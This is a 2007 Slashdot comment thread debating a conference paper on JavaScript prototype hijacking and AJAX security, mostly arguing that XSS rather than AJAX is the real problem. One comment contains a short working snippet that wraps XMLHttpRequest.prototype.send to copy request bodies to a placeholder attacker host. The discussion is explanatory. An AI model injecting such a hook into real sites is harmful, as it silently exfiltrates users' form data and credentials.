
AJAX May Be Considered Harmful

87C751 writes "Security lists are abuzz about a presentation from the 23C3 conference, which details a fundamental design flaw in Javascript. The technique, called Prototype Hijacking, allows an attacker to redefine any feature of Javascript. The paper is called 'Subverting AJAX' (pdf), and outlines a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it."
  • first post (Score:5, Funny)

    by Anonymous Coward on Saturday January 06, 2007 @04:21PM (#17491204)
    So can I hijack slashdot to always get the first post?
    • re: first post (Score:4, Interesting)

      by jimbojw ( 1010949 ) <wilson@jim@r.gmail@com> on Sunday January 07, 2007 @02:08AM (#17495424) Homepage
      You might - if you can find an available XSS vulnerability to use as a vector. TFA assumes this blithely for the sake of demonstration, but it's a big assumption.

      Further, the slashdot summary suggests that Prototyping is a design flaw in JavaScript/ECMAScript. This is wrong for two reasons:
      1. The article doesn't mention this.
      2. Prototyping is not a design flaw.
      Prototyping is a very useful language feature that can be used to do all sorts of things that would otherwise be cumbersome or impossible. Ruby's open classes give it much the same flexibility - a capability responsible for much of the 'magic' of Rails.

      The article does outline a number of Ajax related vulnerabilities, but like most vulnerabilities, they can be mitigated or avoided entirely if paid attention to - much like the SQL injections of old.

      Arguing that Prototyping or Ajax makes JavaScript unsafe is FUD. These are powerful language features that (like any powerful feature) can be used for evil if an injection mechanism is available.
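      As a trivial illustration of the kind of convenience prototyping buys you (the method name here is made up):

        // Illustrative only: give every string a capitalize() helper.
        String.prototype.capitalize = function () {
          return this.charAt(0).toUpperCase() + this.slice(1);
        };

        alert("hello world".capitalize()); // "Hello world"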
      • Re: first post (Score:5, Insightful)

        by Crayon Kid ( 700279 ) on Sunday January 07, 2007 @08:03AM (#17496950)
        [..]if an injection mechanism is available.
        Therein lies the crux of the issue. XSS is the culprit, not Ajax, not prototyping, not JavaScript itself. It all comes down to incompetent developers allowing visitors to inject JavaScript that other visitors will execute. Period. Once custom JS is executed, all bets are off; assume the worst.

        This is an extremely basic point in security of any kind: once the attacker is executing code inside your system, that's bad. Never mind the fact that other limiting factors will mitigate the range of the attack (browser-only for JavaScript, account-permissions-only for other attacks). Most effort should go into preventing intrusion, not limiting damage after the attacker is "in".
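        For what it's worth, a minimal sketch of the output escaping that closes the injection hole in the first place (the helper name is made up):

          // Escape user-supplied text before writing it into the page, so an
          // injected <script> tag is rendered as text instead of executed.
          function escapeHtml(s) {
            return String(s)
              .replace(/&/g, "&amp;")
              .replace(/</g, "&lt;")
              .replace(/>/g, "&gt;")
              .replace(/"/g, "&quot;");
          }

          var userInput = '<script>alert(1)</scr' + 'ipt>'; // split so this sample can live inline
          alert(escapeHtml(userInput)); // harmless text, not executable markup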
  • by mobby_6kl ( 668092 ) on Saturday January 06, 2007 @04:21PM (#17491208)
    Not surprising considering that slashdot is slowly trying to AJAXify itself...
  • Haven't RTFA yet, but I doubt it will live up to the hype.
    • by Anonymous Coward on Saturday January 06, 2007 @05:14PM (#17491660)
      I haven't read it either, but from experience, I'd imagine it holds up very well.

      AJAX applications just aren't solid or stable, for the most part. We tried to integrate a number of them into our network here, and frankly each attempt went terribly. I'd like to think it was just one application vendor or AJAX toolkit that was problematic, but that wasn't the case.

      We found a number of common problems with every AJAX application we tried. Just for the record, the applications included three CMS systems, a Web-based email system, two groupware systems, and three Web forums.

      The first major problem was one of resource usage, on both the client-side and the server-side. Client-side, many AJAX applications consume far too much CPU time. From our investigation, it was due to the use of poor JavaScript algorithms that'd consume 100% of the CPU in some cases, for minutes on end. The applications "worked", in that they'd provide the correct result. It'd just take them far too long to get it done.

      On the server-side, they'd again result in excessive CPU and RAM consumption. For one of the Webmail systems, we could only handle a fifth (yes, 20%) of what our old Perl-based system could. And that was on a quad-core Opteron system with 8 GB of RAM! The Perl-based system was on a couple of 200 MHz Pentium systems, each with 128 MB of RAM. Even after assistance from the AJAX-based Webmail system's vendor, we were only able to handle roughly 90% of the number of transactions of our older system.

      The second major problem is that of usability. Many of the AJAX apps we tried didn't play well with browser tabs, for instance. Some even fucked around with text input areas, resulting in copy-and-pasting no longer working. One application even prevented the text within a text field from being highlighted! We thought these problems might be browser-specific incompatibilities, but we ran into this same problem with Firefox, Safari, Opera, and even IE6! After talking with the vendor, they admitted these were known problems, and no solutions were presently available.

      The third major problem is a lack of quality. Many AJAX applications are poorly coded and poorly designed. I think the main reason for that is because it's such an unstructured technology. Even competent software developers run into problems that cannot be solved easily, and thus must resort to hackish techniques to overcome these inherent problems.

      The fourth major problem was that the users hated the systems. Of the few systems we managed to roll out successfully, the users absolutely hated them. Their complaints were a combination of the above three factors. The AJAX applications would not do what the user wanted. The AJAX applications did not conform to common practices (eg. copy-and-paste, textbox text selection, etc.). The AJAX applications ran far too slowly, even on fast client machines. The AJAX applications just plain didn't work!

      All of our AJAX trials were abysmal failures. That's why we're sticking with the existing Perl- and Java-based systems that we currently use. They perform far better on much fewer resources, actually do what the users want, avoid violating the most common of conventions, and they do what they're supposed to. I'm sorry to say it, but AJAX might just be the worst technology I have ever had to deal with.

      • I have all those problems with Changepoint. It's supposed to make our life easier, but it's a huge nightmare. It's slow: on my dual-core Centrino with 2GB of RAM it crawls, even on a 12MB internet link. Plus, because somebody forgot to update the code, it doesn't work with IE7 (which I use for testing, and which sucks) AND Firefox.
        Same with, for example, Yahoo Mail. All my friends who used the 'new improved' one reverted to the old one. Too slow and annoying.
        There are more examples like that. When finally vendors understand that
      • Sorry, I still don't think that it will "kill the Web as we know it." That's sensationalist, fear-mongering BS.
      • by Zarel ( 900479 ) on Saturday January 06, 2007 @06:42PM (#17492450)
        Have you ever considered that those could all be badly programmed? I mean, I could write a Java program that took tons of resources, ran really slowly, didn't allow text selection, and more. And I could write an Ajax application that ran far faster than the equivalent non-Ajax one.

        As for your specific case of a text field being unhighlightable, I suspect that has to do with the Ajax application using onSelectStart to disable selection within the page (sometimes as really crappy DRM, sometimes because click-and-dragging is needed for some other functionality), and not knowing how to re-enable it for the text field (which is something I, a 16-year-old, know how to do). Problems like the ones you describe are usually caused by vendor incompetence.
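        A rough sketch of the fix being alluded to, assuming the page used an IE-style onselectstart handler to ban selection (everything beyond the standard tag names is illustrative):

          // Instead of a blanket "return false" (which kills selection everywhere),
          // allow the default behaviour when the event originates in a form field.
          document.onselectstart = function (e) {
            var target = (e && e.target) || window.event.srcElement;
            var tag = target && target.tagName;
            return tag === "INPUT" || tag === "TEXTAREA";
          };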

        Ajax, by itself, can't possibly cause any of the problems you describe. All it is is a system by which Web pages can interact with the server without needing to load a new page. This means:

        1. Less bandwidth is used because you don't need to load layout information for each page. Consequently, it's faster than non-Ajax applications.

        2. The Back button goes to the last page, as opposed to the last action, which is a good thing for true Web applications, since the Back button usually causes tons of problems (Ever seen "DON'T PRESS THE BACK BUTTON OR YOU COULD ACCIDENTALLY PAY FOR THIS PRODUCT TWICE"?).

        3. If coded to do so, the server can relegate translating raw data into a human-readable HTML layout to the client. This is usually done because the client usually has many processor cycles to spare, while the server doesn't. (This also doesn't take much processing power, and should be unnoticeable to the client)

        4. You have more control over page transitions, and you can have things like "Loading..." messages while the data is being fetched from the server (as opposed to traditionally, where the only indication is "Loading..." in the browser status bar and the top right loading animation, and then, when it loads, the page goes white and the new layout is loaded.)

        Those are the only differences. So, in reality, Ajax is superior in every way for Web applications, and the problems you describe are caused by bad programming practices, and would've happened whether or not they were written in Ajax.
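        To make "all it is" concrete, here's a bare-bones round trip (the URL and element id are made up):

          // Minimal Ajax: fetch a fragment and drop it into the page, no reload.
          var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                          : new ActiveXObject("Microsoft.XMLHTTP");
          xhr.open("GET", "/messages/latest", true); // made-up URL
          xhr.onreadystatechange = function () {
            if (xhr.readyState === 4 && xhr.status === 200) {
              document.getElementById("inbox").innerHTML = xhr.responseText;
            }
          };
          xhr.send(null);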
        • Re: (Score:3, Informative)

          by julesh ( 229690 )
          2. The Back button goes to the last page, as opposed to the last action, which is a good thing for true Web applications, since the Back button usually causes tons of problems (Ever seen "DON'T PRESS THE BACK BUTTON OR YOU COULD ACCIDENTALLY PAY FOR THIS PRODUCT TWICE"?).

          The Post-and-Redirect design pattern (or the use of unique once-only form ids) solves this problem in almost all cases. Only badly written web apps still suffer from it.
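          For anyone unfamiliar with the pattern, a sketch in server-side JavaScript (Node-style; the routes and port are invented):

            // Post/Redirect/Get: answer the POST with a redirect so that refreshing
            // or pressing Back re-issues a harmless GET instead of re-submitting.
            var http = require("http");

            http.createServer(function (req, res) {
              if (req.method === "POST" && req.url === "/buy") {   // invented route
                // ... record the order exactly once here ...
                res.writeHead(303, { "Location": "/receipt" });    // See Other
                res.end();
              } else if (req.url === "/receipt") {
                res.writeHead(200, { "Content-Type": "text/html" });
                res.end("<p>Order received.</p>");
              } else {
                res.writeHead(404);
                res.end();
              }
            }).listen(8080);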

          The rest of your points are good, though.
      • by 75th Trombone ( 581309 ) on Saturday January 06, 2007 @07:30PM (#17492852) Homepage Journal

        You've stated quite an amount of vagueness there, sir, not to mention this confounding statement:

        All of our AJAX trials were abysmal failures. That's why we're sticking with the existing Perl- and Java-based systems that we currently use.

        Very interesting, seeing as how AJAX has nothing to do with your server-side technology whatsoever. Or how about this:

        The AJAX applications did not conform to common practices (eg. copy-and-paste, textbox text selection, etc.)

        Again very interesting, seeing as how AJAX itself has nothing to do with the way users interact with form elements.

        It sounds to me like either 1) you're BSing, which is my actual guess, or 2) you and your team have no idea how to actually code Javascript/AJAX/whatever, and you picked crappy packages off the internet and expected them to Just Work out of the box the same as your custom built solution.

        Your problems have had nothing to do with AJAX; rather, they have had to do with either your lack of knowledge or your life as a Slashdot troll.

      • by misleb ( 129952 ) on Saturday January 06, 2007 @08:45PM (#17493416)
        On the server-side, they'd again result in excessive CPU and RAM consumption.


        I'm going to call bullshit here. An ajax application is not significantly different on the server side than a regular web app. In fact, it is often easier on the server because the server only needs to render a small portion of the result for a given action rather than an entirely new page.

        The Perl-based system was on a couple of 200 MHz Pentium systems, each with 128 MB of RAM. Even after assistance from the AJAX-based Webmail system's vendor, we were only able to handle roughly 90% of the number of transactions of our older system.


        What does "perl based" have to do with it? You could very well have a Perl based (on the server side) AJAXy application.

        All of our AJAX trials were abysmal failures. That's why we're sticking with the existing Perl- and Java-based systems that we currently use.


        Bullshit again. You are comparing AJAX with Perl/Java based systems as if there was any comparison to be made. Saying Perl based systems are better than AJAX systems is like saying roads are better than cars!

        But thanks for your input anyway, Mr. Coward.

        -matthew
    • by Tablizer ( 95088 ) on Saturday January 06, 2007 @05:14PM (#17491664) Journal
      Haven't RTFA yet, but I doubt it will live up to the hype.

      Which hype, AJAX itself or AJAX ending the world?

      Does Al Gore know anything about this?
               
  • by JoshJ ( 1009085 ) on Saturday January 06, 2007 @04:22PM (#17491216) Journal
    Javascript vulnerabilities will stop people from using AJAX just like Word vulnerabilities will stop people from using Microsoft Office.
    • Re: (Score:3, Informative)

      by cnettel ( 836611 )
      Well, ever since Word 97, there have been features intended to let the user disable auto-running macros. That's also been the default. This is not really a problem, as most Word files should not contain macros. Even if they do, most files are still useful without them, and are probably used within the context of a controlled intranet (with code signing in place). If the view that Javascript is inherently impossible to make secure were to gain ground, AJAX would go the way of ActiveX controls.

      Now, I know you

      • The web would certainly change if that attitude were to become the norm.

        After 'change' you forgot to include 'for the better' :)

    • When vulnerabilities of C/C++ stop people from using C/C++, this may happen.
    • Yup, everyone I know has stopped using it... Microsoft is going broke since they can't sell MSO anymore.

      Nah, people really don't care/understand/know.
    • Re: (Score:3, Insightful)

      by jellomizer ( 103300 ) *
      Boo hoo. You hate new technologies, so you get modded insightful.
      I really don't see where this huge hatred of JavaScript comes from. JavaScript, and now AJAX (which is just a method of using JavaScript), is actually one of the best ways of combining server- and client-side applications that works multi-browser and multi-platform. As well, the bandwidth savings can be good because you only send the information you need once. Things like Flash, Java applets, and ActiveX are good examples of a bad attempt to
  • Web 2.0.1 (Score:5, Funny)

    by ticklish2day ( 575989 ) on Saturday January 06, 2007 @04:23PM (#17491226)
    Patch the hole and release Web 2.0.1. Good thing there's already a Web 3.0 [alistapart.com] in the works.
  • Greasemonkey? (Score:2, Interesting)

    Isn't this the thing that forced the redesign of Greasemonkey a while back?
    • Re:Greasemonkey? (Score:4, Informative)

      by JackHoffman ( 1033824 ) on Saturday January 06, 2007 @04:49PM (#17491444)
      No, Greasemonkey exposed security sensitive functions to websites. They were meant to be used by Greasemonkey scripts but websites had access too.

      This is about the way Javascript implements object oriented programming: In Javascript you don't define classes from which objects are instantiated. In a nutshell, you create prototype objects and new objects are copies of the prototypes. The "attack" is to change existing prototypes. For example, you can add a new function to the String prototype or replace an existing function with your own implementation. Every String object then gets the new function. There is one problem with this: Cross site checks don't apply. A script from one site can't simply communicate with another site, but it can modify the prototypes that the scripts from the other site use and subvert the communication of the other script with its host.
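      For illustration, a minimal sketch of what such a hijack looks like once an attacker already has script running in the page, in a browser that exposes XMLHttpRequest.prototype (Firefox does; IE6's ActiveX flavour doesn't). The leak URL is made up:

        // Keep a reference to the real method, then replace it with a wrapper
        // that copies every request body to an attacker-controlled server.
        var realSend = XMLHttpRequest.prototype.send;
        XMLHttpRequest.prototype.send = function (body) {
          (new Image()).src = "http://evil.example/steal?d=" + encodeURIComponent(body || "");
          return realSend.call(this, body); // the page keeps working as before
        };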
      • by gkhan1 ( 886823 )
        That's.... I mean.... WOW! Thank you for explaining.
      • Re:Greasemonkey? (Score:5, Insightful)

        by suv4x4 ( 956391 ) on Saturday January 06, 2007 @08:09PM (#17493150)
        There is one problem with this: Cross site checks don't apply.

        You didn't test that and just assumed it's true, I guess. But if they do apply, and each page context runs in its own sandbox with its own version of String, Number, and so on, you'd sound pretty stupid, right?

        Try it yourself, the prototypes are NOT shared. They are not shared even among two page tabs on the same domain.

        In fact not shared even among two instances of the SAME PAGE.

        Embarrassing, I guess, for all the posts modded 5+ claiming this in this article.
  • by Sloan47 ( 977340 ) on Saturday January 06, 2007 @04:27PM (#17491262)
    "...and could kill the Web as we know it." Oh come on! Isn't that exaggerating a tad? Obviously with some browser patches and more secure server code, the problem is solved. Gotta love sensationalism!
    • by mctk ( 840035 )
      No. It won't be okay. The internets will die.

      It's been fun intar-web! We've had some good times! Never let go!
  • notabug (Score:3, Insightful)

    by QuoteMstr ( 55051 ) <dan.colascione@gmail.com> on Saturday January 06, 2007 @04:31PM (#17491290)
    This paper is absolutely ridiculous, and its author is scaremongering --- if you have access to a site's scripting system via some cross-site vulnerability, then you don't _need_ to subvert an object's prototype to change its behavior. If you're relying on client-side code of any sort, be it written in Javascript or C, for security, you're up a creek without a paddle anyway. Oh nooes, man in the middle proxy attacks! Oh noes, browser bugs allowing javascript to leak outside its security context! There is no security vulnerability in this paper that hasn't been known and worked around for years. I'm wondering what kind of agenda the author has in writing this, actually.
    • Re: (Score:2, Funny)

      by kfg ( 145172 )
      This paper is absolutely ridiculous, and its author is scaremongering

      He's obviously been watching too much local weather forecasting lately:

      "Scattered showers in the afternoon; Save the women and children!"

      The Society of Hysteria really is getting to be a bit much.

      KFG
    • Re:notabug (Score:5, Informative)

      by coma_bug ( 830669 ) on Saturday January 06, 2007 @04:56PM (#17491476)
      I'm wondering what kind of agenda the author has in writing this, actually.

      page 3
      This technique has been found by S. Di Paola and is called Prototype Hijacking. It represents the state of the art in hijacking techniques applied to the Javascript language.

      page 6
      This new kind of attack has been called AICS and has been thought by S. Di Paola and G. Fedon and developed by S. Di Paola.

      page 8
      Stefano Di Paola. Senior Security Engineer of proved experience, works since many years as an IT consultant for private and public companies. He teaches Database Programming and Information Security at the University of Florence. Since 1997 is a well known security expert; he found many of the most dangerous vulnerabilities in recent releases of MySQL and PHP. From 2004 his researches focused mainly on Web security. Actually he is part of OWASP (Open Web Application Security Project) team and he's the focal point of Ajax security for the Italian Chapter.

      He is the creator of http://www.wisec.it/ [wisec.it]

      Giorgio Fedon. Currently employed as senior security consultant and penetration tester at Emaze Networks S.p.a, delivers code auditing, Forensic and Log analysis, Malware Analysis and complex Penetration Testing services to some of the most important Companies, Banks and Public Agencies in Italy. He participated as speaker in many national and international events talking mainly about web security and malware obfuscation techniques. During his past job he was employed at IBM System & Technology Group in Dublin (Ireland).

      Actually he is part of Owasp (Open Web Application Security Project) Italian Chapter.
    • by KalvinB ( 205500 ) on Saturday January 06, 2007 @05:04PM (#17491554) Homepage
      JavaScript S on Domain A needs to access the server-side script on Domain B. All S has to do is AJAX to a local bridging script which forwards the request using cURL, LWP, etc. to B. The bridge then feeds the response to S. S has no idea that the AJAX request went to another domain. As far as B knows, A is just a web visitor.

      Since AJAX runs on the client side it's not possible to whitelist IPs and Referers can be spoofed.

      As with every client/server app the client can never be trusted.
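      A rough sketch of the client half of that arrangement (the bridge path and handler are hypothetical; the forwarding itself is a few lines of cURL or LWP on the server):

        function handleData(text) { alert(text); } // placeholder for real processing

        // S never talks to Domain B directly; it asks its own server to relay.
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "/bridge.php?url=" + encodeURIComponent("http://domain-b.example/api"), true);
        xhr.onreadystatechange = function () {
          if (xhr.readyState === 4 && xhr.status === 200) {
            handleData(xhr.responseText); // response actually came from Domain B
          }
        };
        xhr.send(null);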
      • In other words, if your javascript calls anything that proxies a resource, normal per-domain restrictions don't apply.

        This isn't even XSS. It's just how it works...

        Wake me up when there's some REAL news :-)

    • Re:notabug (Score:5, Informative)

      by stonecypher ( 118140 ) <stonecypherNO@SPAMgmail.com> on Saturday January 06, 2007 @05:11PM (#17491632) Homepage Journal
      This paper is absolutely ridiculous, and its author is scaremongering

      Try reading the paper before lambasting it. The stuff you saw in the slashdot article isn't in the paper. The author of the paper says things like "innovative new attack" and "next generation of server side injection." The stuff about end of the web as we know it is from the slashdot poster. The paper is quite insightful, and the author is almost blase about the whole thing. It's quite clear that he simply believes he's unearthed a new form of attack, and he's in fact quite correct.

      Please get off of your soapbox. You're wrong.
      • Re: (Score:2, Informative)

        by coma_bug ( 830669 )
        Try reading the paper before lambasting it.

        Well, I have read the paper and it is absolutely ridiculous. If the attacker can inject JavaScript or HTML or whatever into the connection, it doesn't matter whether the site is Web 1.0, Web 2.0 or Web 3.14159, because the session is compromised anyway. If you want web security you'll need TLS.
      • The paper is quite insightful, and the author is almost blase about the whole thing. It's quite clear that he simply believes he's unearthed a new form of attack, and he's in fact quite correct.

        No, the author has not actually unearthed anything new; the mutability of object prototypes is a well-known and well-understood aspect of JavaScript. The potential to cause unexpected behavior by changing the prototypes of built-in objects is likewise well-known and well-understood (and has been a source of com

        • Neither of these things are new. The idea of using them to launch an attack, by altering the behavior of existing objects so that trusted JavaScript behaves differently than expected, may possibly be new

          The possibility of using them to launch an attack is what he's claiming is new, and I've never heard of it before. This is something I keep up with, so I'm going to remain somewhat firm in my belief that this is an insightful paper until someone shows me prior exposition.
          • This technique requires the prior existence of a full-exploitable XSS hole before it can work; otherwise the script which modifies object prototypes never loads and never executes. Again, the author of this paper is simply saying, "if your site has an XSS hole I can use an XSS exploit against it". This would be akin to a physical security expert pronouncing that he can get into your house if you leave your doors and windows unlocked, and is not earth-shattering or insightful in any way; the only reason it's

    • Heh. I love the 'notabug' tracker tag. Dismisses the submitter politely.

      But, yes, there is nothing new in AJAX that causes security problems. It is not new tech, just a style of architecture. The same problems and solutions with respect to security exist for AJAX as for the underlying infrastructure. Java applets, Flash apps, "traditional" Javascripted pages, all have had their trials and tribulations in the past, and their security models are well mapped-out. The sandboxes already exist. AJAX ru

  • by levell ( 538346 ) on Saturday January 06, 2007 @04:35PM (#17491322) Homepage

    Having skim-read the article, it outlines how *if* you can execute malicious javascript for a website, you can subvert the AJAX communication so that you can mount man-in-the-middle attacks, etc.

    However once an attacker can execute malicious javascript in the scope of the target website you're toast whether you are using AJAX or not.

    I'll make a bold prediction and say that is not going to "kill the Web as we know it" contrary to what the /. article says.

    • Re: (Score:3, Funny)

      by Vo0k ( 760020 )
      1. Prepare malicious javascript code capable of subverting AJAX in the domain it's installed in.
      2. ???
      3. Subvert their AJAX, intercept their communications, change their content, kill the Web as we know it, and ultimately, profit!!!
  • a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.

    This statement has FUD written all over it. (or was it written in FUD?)

    • Re:FUD? (Score:5, Funny)

      by ednopantz ( 467288 ) on Saturday January 06, 2007 @04:43PM (#17491394)
      >(or was it written in FUD?)

      Ok, I propose we create a new programming language called FUD. Variables will be assumed to have their most sinister values and be impossible to verify.
      • Re: (Score:3, Funny)

        Ok, I propose we create a new programming language called FUD. Variables will be assumed to have their most sinister values and be impossible to verify.

        Is that language derived from brainfuck?

    • Re:FUD? (Score:5, Funny)

      by monoqlith ( 610041 ) on Saturday January 06, 2007 @04:46PM (#17491418)
      . (or was it written in FUD?)

      Sadly, no. The FUD compiler was written in Javascript, and was hijacked.
    • by wasted ( 94866 )
      ...a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.

      This statement has FUD written all over it. (or was it written in FUD?)

      I was hoping that it wasn't totally FUD, and the result would be that the term Web 2.0 would be killed. Guess my luck isn't that good.
  • I hate JS; it had potential, 8-9 years ago. What we are seeing now is a push way beyond its original intended scope. The truth is, it would have had much less potential for vulnerability if it had not been neglected for so long. Every time I have to get down and dirty with it I think of that. It's OK, and some things are nice from a shorthand perspective if you're used to other lll, but for GOD'S sake, revise the spec and put some effort into it. Oh wait, but that's been part of the problem all along, MS puts th
    • by cnettel ( 836611 ) on Saturday January 06, 2007 @04:47PM (#17491434)
      Python also allows on-the-fly redefinitions, which is blamed here. Generally, the choice of scripting language is not the problem here. Most "Javascript" bugs translate directly into VBScript if you're IE-masochistic (or Perlscript, if you've managed to install that and trick IE into running the engine for it). The problem is in the DOM, what objects might theoretically be exposed, and how it's crucial that some part of the browser can access them, while others should not. After all, in Mozilla, the whole UI is held together by Javascript, running in basically the same engine, but a different sandbox. The situation with the IE scripting environment is quite comparable.
    • Re: (Score:3, Insightful)

      by FLEB ( 312391 )
      The problem is that any other interactivity solution has to be universally applied, and right now there's a universal solution that's adequate, more adequate than instituting a ground-up rebuild, so anything in the future is going to be tacked-on to that. I suppose the best we can hope for is incremental, inside-to-out cleanup of the language, and, like CSS and "quirks modes" do, old code that breaks is switched to a legacy mode. Still, though, I think it's going to stay JavaScript, at least for the forseea
      • Re: (Score:2, Interesting)

        by kirun ( 658684 )

        "Javascript is nothing related to Java".

        It didn't use to be (apart from both of them having C-related syntax and Interweb-related hype), but it is now [mozilla.org] if you're using Firefox. For example, the following works:

        <script> document.write(new java.lang.String("I'm here")); </script>

        They're no fun though, they left out stuff like java.io

    • by smittyoneeach ( 243267 ) * on Saturday January 06, 2007 @05:01PM (#17491522) Homepage Journal
      What we are seeing now is a push way beyond its original intended scope.

      Name a Turing-complete programming tool which has not seen this.

      I throw in the qualifier because, other than stuff like regular expressions and SQL, which are not Turing-complete and have blissfully narrow scopes, everything else has seen javascript-acular scope creep.

      Here, have an httpd written in PostScript: http://public.planetmirror.com/pub/pshttpd/ [planetmirror.com]

      Perhaps not being Turing-complete is a left-handed virtue.
      • by truedfx ( 802492 )
        I throw in the qualifier because, other than stuff like regular expressions and SQL, which are not Turing-complete and have blissfully narrow scopes, everything else has seen javascript-acular scope creep.
        Extended regular expressions have been used as tests for prime numbers [pm.org]. I'd say that counts as beyond the original intended scope.
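          The trick, for anyone who hasn't seen it, encodes the number in unary and lets backtracking hunt for a divisor; a sketch in JavaScript:

            // n is prime iff a string of n "1"s matches neither "zero or one 1"
            // nor "some group of two-or-more 1s repeated at least twice".
            function isPrime(n) {
              var ones = new Array(n + 1).join("1"); // n ones
              return !/^1?$|^(11+?)\1+$/.test(ones);
            }

            for (var n = 2; n <= 20; n++) {
              if (isPrime(n)) document.write(n + " "); // 2 3 5 7 11 13 17 19
            }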
        • by WillerZ ( 814133 )
          SQL is now used to select messages for delivery in JMS, which it wasn't designed for. It's difficult to do efficiently in that situation, and thus no-one has yet.
      • I cannot disagree. BUT it doesn't mean it's the right choice or even a good choice.
        I am an extremely adept programmer. I have been coding since I was 7 (in 1977); I started with Fortran (yes, 77 :)
        I could code web pages, or whatever, in assy if I wanted.
        When .NET was announced and the first CLR specs were released for "ratification", I started (just for shits and grins) to code in CLR assembler. It was a challenge, and something I have yet to find one of my contemporaries can do. Well... it's proved valuable
        • Re: (Score:3, Interesting)

          I could, code web pages, or whatever in assy if I wanted .
          What web browser are you using that has a built in assembler?
    • by pestilence669 ( 823950 ) on Saturday January 06, 2007 @08:26PM (#17493282)
      JavaScript has gotten a pretty bad rap. I think unfairly. People tend to pigeonhole it as a "web" scripting language, which is certainly how it started off, but it's much more capable than that. Even Java started off as a "Web" language (with ambitions of world domination). Both have matured in the past decade.

      JavaScript has all the niceties of modern OO languages and more, because it's prototype-based. All that's needed is some discipline, because it also allows you to write exceptionally ugly code. Both Perl and C++ are the same way. You can drop into procedural hell any time you like. In C++, you can even resort to goto statements or drop into assembler.

      In JavaScript you can have static class methods & members, encapsulation (private methods & such), multiple layers of abstraction, and features even Java can't handle, like: multiple inheritance, closures, reflection, and dynamic typing. Not too shabby for a crappy little scripting language.
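      For example, encapsulation falls out of closures with no extra machinery (a minimal sketch):

        // "count" is a private member: nothing outside the closure can touch it.
        function makeCounter() {
          var count = 0;
          return {
            increment: function () { return ++count; },
            value:     function () { return count; }
          };
        }

        var c = makeCounter();
        c.increment();
        c.increment();
        alert(c.value()); // 2
        alert(c.count);   // undefined -- the private state is not reachable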

      Any nice OO language (like Python, Smalltalk, Ruby) in a browser sounds wonderful... but it'll never work for very long. Do you really think that Microsoft could keep proprietary language tweaks out of their implementations? It happens with JavaScript all of the time. Netscape added proprietary features because it was THEIR language. AFAIK, that stopped as soon as it was offered up for standardization.

      Microsoft has continued to make proprietary "contributions" to JavaScript. If it weren't for them, everybody's JS implementations would work together in harmony. Microsoft alters their HTML, XML, CSS, and C++ implementations in ways that prohibit cross-platform compatibility (what a surprise). They'll do the same to Python.
  • Crying "Wolf" (Score:3, Interesting)

    by flajann ( 658201 ) <fred.mitchell@gm ... minus herbivore> on Saturday January 06, 2007 @04:41PM (#17491372) Homepage Journal

    Do they ever learn? All of this scaremongering is numbing the uninitiated, and when there is a real threat no one will be prepared.

    Well, my BS meter pings off the scale when I see alarmist claims like "shutting down the web." How many of those claims have we all seen over the past years?

    I suppose it's the 21st-century equivalent of "The World is Coming to an End!"

    I consider that anyone who makes such outlandish claims should be remembered, indexed, marked, and noted. When their claims fail to come true, then we can all stand around and laugh at them and grant them Idiot Awards.

  • by Chineseyes ( 691744 ) on Saturday January 06, 2007 @04:44PM (#17491400)
    A Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it lurks in the deep dark recesses of the JavaScript
    Who is this masked man known as the worm?
    Why does he hate Web 2.0 so much?
    Will this worm try to make us revert to Web 1.0?
    And does this worm have anything to do with disappearances of Web 1.1 through Web 1.9?
    This and much much more on the next episode of Days of Our Web 2.0 Lives
  • AJAX != the web (Score:4, Insightful)

    by Anonymous Brave Guy ( 457657 ) on Saturday January 06, 2007 @04:45PM (#17491408)

    The paper is called 'Subverting AJAX' (pdf), and outlines a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.

    Well, considering that AJAX is used on only a tiny proportion of web sites, and often not to particularly good effect, I'd say that's a bit of a silly claim. In any case, AJAX often suffers from the same flaws as pseudo-web technologies like Flash before it: lack of bookmarkability, breaking back buttons, etc. These are far more likely to doom it than any random security flaw.

  • solutions (Score:3, Informative)

    by fyoder ( 857358 ) on Saturday January 06, 2007 @05:03PM (#17491552) Homepage Journal
    • server side: never trust user data.
    • client side: You're hosed. But if you're smart you already regard yourself as hosed. There have been security bugs where a maliciously crafted image could get you. Before going to shady sites you turn off java, javascript, and you would never even visit a shady site with IE. Turning off javascript might make a 'Web 2.0' site unusable, but it's a question of trust.

    If 'Web 2.0' comes to be widely untrusted, it will have to change or die. This doesn't represent any new threat to the web itself. The threats are old and because of their nature have been there from the beginning and aren't going away any time soon.

  • One of the biggest issues I have with Ajax, and really with what the web browser has turned into, is JavaScript.

    Don't get me wrong, I think the language is "alright". The problem is it is the only choice out there.

    There are many flavors of Linux and practically every type of application out there. But only one real choice for scripting on a web page.

    Ajax's primary function is the ability to grab content from a web server (or any server) and then modify the DOM of the web page you are working on.

    This could be done by any
    • First, Jscript ne JavaScript
      Second, if you're unlucky enough to be using IE you do have alternatives: VBScript and,
      if you have installed ActiveState, PerlScript (not that I recommend enabling a browser
      with such power). I also seem to recall a Tcl plug-in back in the day.

      Nevertheless, JavaScript is the de facto standard and so everybody uses it, to minimize
      the potential for "foo only" websites.
  • by Vo0k ( 760020 ) on Saturday January 06, 2007 @05:10PM (#17491616) Journal
    Ajax sucks. Not because of security.

    The article Why Ajax Sucks (Most of the Time) [usabilityviews.com] is a nice spoof of an old article about frames. Despite being a spoof, the word 'frames' replaced by 'ajax' and little else changed, it's surprisingly accurate and nicely outlines WHY it's harmful.
  • Anyone know where I can find a non-PDF version of this paper?
  • According to the label:
    Eye irritant. In case of eye contact, flush with water. To avoid harmful fumes, do not mix with ammonia or other cleaning products. Keep out of reach of children.


    I don't think Comet is any better.
  • by Trails ( 629752 ) on Saturday January 06, 2007 @06:37PM (#17492396)
    As well as the dingbat mod who let this crap summary get on /. unedited?

    I hate all this crap about "ZOMG, once I can inject javascript into a page, something else makes it totally insecure!!!"

    Once someone can inject javascript onto a page, you're toast. The article itself is valid, and isn't complaining about ajax so much as prototyping (despite the title of the paper).
  • Meh... (Score:3, Insightful)

    by Anonymous Coward on Saturday January 06, 2007 @06:41PM (#17492442)

    I'm a professional web developer, and have been using XMLHttpRequest (ajax, if you really want) for the past two years in a large number of web applications. Having taken the time to actually carefully read (not skim) the eight pages of this document, I have only one thing to say: I want my 15 minutes back.

